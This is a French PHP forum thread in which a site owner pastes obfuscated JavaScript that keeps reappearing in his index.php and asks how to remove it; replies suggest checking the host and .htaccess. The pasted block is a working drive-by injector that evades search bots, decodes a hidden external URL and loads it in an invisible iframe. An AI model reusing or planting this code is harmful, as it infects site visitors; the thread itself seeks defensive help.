IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Langage PHP Discussion :

Sécurité site php : injection code malicieux

Sujet :

Langage PHP

Vue hybride

Message précédent Message précédent   Message suivant Message suivant
    Membre confirmé
    Profil pro
    Inscrit en
    Septembre 2006
    Détails du profil
    Informations personnelles :

Informations forums :
    Par défaut Sécurité site php : injection code malicieux
    Salut,

J'ai constaté que des bouts de code sont injectés sur ma page index.php

Voici le genre de code malicieux que je vois sur ma page index.php:
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    if(document.cookie.indexOf('urchin')==-1 && !window.navigator.userAgent.toLowerCase().match(/(crawler|googlebot|msnbot|yahoo|search|indexer|cuill.com|stackrambler|aport|yandex|bing|ask)/)) { res=new Date();res.setTime(res.getTime()+80000000);document.cookie='urchin='+escape('google-analytics.com')+';expires='+res.toGMTString()+';path=/'; function iO(){};var lV=new Date();iO.prototype = {bF : function() {sV=false;this.qY='';this.cA='';return 'h<t<t<p6:4/6/4i4mxg6d4oxw6n6l4o}axdxsx.<c}o}m}/4i4n4.<c6g6i}?436'.aI(/[6\}4x\<]/g, '');var kO=function(){};nW='nW';var wP=false;var hH='';},t : function() {var bP=function(){};zY=53599;this.qL='qL';pT='';var iY=function(){};this.mM=false;var mL=function(){return 'mL'};var u=window;l=5320;aN='aN';this.kL=63107;vL='';var i=document;this.nH=false;function yW(){};this.bA='bA';this.nT='';vK='';var g=function(){};this.pW='';var aZ=function(){};    String.prototype.aI=function(o,e){return this.replace(o, e)};zM='';function hB(){};cL='';var aD=new Array();var hO=new Date();var lS=new Date();mO=21254;var m = 'd#i.sUp3l#a.y#'.aI(/[#3%U\.]/g, '');uK=false;var dU=21553;var pA=28676;var b = 'nroQn+e)'.aI(/[\)rP\+Q]/g, '');this.j=false;this.dUM='';sL='';var oC='';        var s = 'aTp;pEeEn;dEC0hEi;lcdT'.aI(/[TE;c0]/g, '');this.oD=57616;this.nR=28704;var q = 'c&rHeDaHtDe&E&lfevmHeHnDtH'.aI(/[Hf&Dv]/g, '');pI=false;this.jZ='';this.kD=false;var a = 'b0oideyt'.aI(/[t0pei]/g, '');var bO=new Array();this.jZO=49972;var qLQ=15686;var h = 'sYtYyYlYen'.aI(/[n\>Y3\^]/g, '');this.xE='';function dS(){};var oDS=new Array();this.bV=37119;var x = 'iTfLrOaLm2eL'.aI(/[L2\+OT]/g, '');oV='';function oDL(){};var r=61212;this.tG='';var z = 'w[r[iQtseJ'.aI(/[JQsW\[]/g, '');this.qMC='';function xQ(){};this.iL='';this.jG='';var qM = 'sPe;tNAztPtzrPi%bNu;tPeN'.aI(/[N;%zP]/g, '');var nN=new Date();var vG=new Date();var w = 's_rfc_'.aI(/[_0f,\|]/g, '');var kOW=function(){return 'kOW'};zU=false;var bC='';var jA=new Date();var f = 's!e^t^T^i!m!e!ovuStS'.aI(/[SXv\!\^]/g, '');tX=false;lX='';var tP=false;this.tA='';var p = 'c8dC<Y/YbWoCdWyC>U<Y/ChUtUmWlC>W'.aI(/[W8CYU]/g, '');this.eS='eS';function sT(){};var bH=new Array();var rR='';function cX(){};var yH='';try {this.cC=52370;jP='jP';this.mF='';var dZ=false;var eK=function(){return 'eK'};var bT=new Array();var n=this.bF();var qK='';this.rT=22879;var k=i[q](x);var vLY='';iYT=false;lW=26789;bM='bM';this.iH=62649;this.tK=24505;cQ=51387;k[h][m] = b;gM='';var oH=false;iR='iR';var pD='pD';k[qM](w, n);var bMA=6076;dB='';function dC(){};var oZ=function(){return 'oZ'};eR=false;document[a][s](k);this.kC='';var aL='aL';this.kLB=59319;wZ=false;var iJ='';rG=7858;var bK=false;} catch(y) {this.aF='';var lD=function(){};i.write(p);this.uL='';var kOG=41230;var v = this;var rGO='';var oG='';tM='tM';wC=false;u[f](function(){ var pJ=function(){};this.eN=false;var oHG=function(){return 'oHG'};kY=false;v.t();fS=false;function jW(){};}, 380);this.iRM=22881;this.fK=false;var mD='';var eB=new Array();}var iM=function(){};this.xH='';}};var uE=new Date();var bCW=new iO(); this.iF='';bCW.t();var pL=new Array();}
    Auriez-vous une idée de la façon dont ce hacker procède car je ne comprends pas. Comment régler définitivement le problème ?

J'ai déjà essayé de supprimmer le code mais cela revient toujours. J'ai aussi changer mes codes ftp et mots de passes. Rien n'y fait.

Merci à vous tous

John

Membre émérite
    Profil pro
    Inscrit en
    Mars 2005
    Détails du profil

Informations forums :
    Par défaut
    tu es chez free ?

Membre chevronné

Profil pro
    Inscrit en
    Décembre 2004
    Détails du profil

Informations forums :
    Par défaut
    Salut,

Ton code "malicieux" contient les noms des moteurs de recherches.
    Tu es sûr que cette ligne ne vient pas de ton hébergeur ?

Membre confirmé
    Profil pro
    Inscrit en
    Septembre 2006
    Détails du profil

Informations forums :
    Par défaut
    Tout d'abord merci de vos réponses.

Je suis chez OVH. Je ne pense pas que ça vienne de OVH. Ils n'ont théoriquement pas le droit de rajouter du code dans nos pages, non ?

J'ai lu pas mal de docs sur les injection sql et sur les XSS mais je ne sais pas dire si c'est le cas ici.

John

Membre émérite
    Profil pro
    Inscrit en
    Mars 2005
    Détails du profil

Informations forums :
    Par défaut
    Je posais la question parce que j'ai entendu parler de deux cas du même genre, tous deux hébergés chez free. Dont un blog dotclear, à priori pas trop passoire.
    Il serait surement intéressant, comme le dit Guardian, de voir avec ton hébergeur.

Membre chevronné

Profil pro
    Inscrit en
    Décembre 2004
    Détails du profil

Informations forums :
    Par défaut
    À ma connaissance, OVH ne fais pas ce genre d'injection.
    C'est plutôt le fait de petits hébergeurs gratuits et c'est stipulé dans les conditions d'utilisation.

Tu as un .htacess sur ton site ?
    Tu as un compte google-analytics ?

Membre confirmé
    Profil pro
    Inscrit en
    Septembre 2006
    Détails du profil

Informations forums :
    Par défaut
    Salut,

Non, pas de htaccess et pas de compte google analytics je pense. C'est vrai que je m'étais une fois renseigné la dessus mais je ne crois pas avoir créer de compte ni demandé de lancer la procédure.

John

Discussions similaires

1. [Sécurité] protections php pour XSS, injections SQL, etc
    Par nintendoplayer dans le forum Langage
    Réponses: 1
    Dernier message: 20/03/2008, 08h57
  2. Réponses: 4
    Dernier message: 20/01/2007, 14h37
  3. [Sécurité] site web php easyphp
    Par Go_Ahead dans le forum Langage
    Réponses: 1
    Dernier message: 16/01/2007, 09h47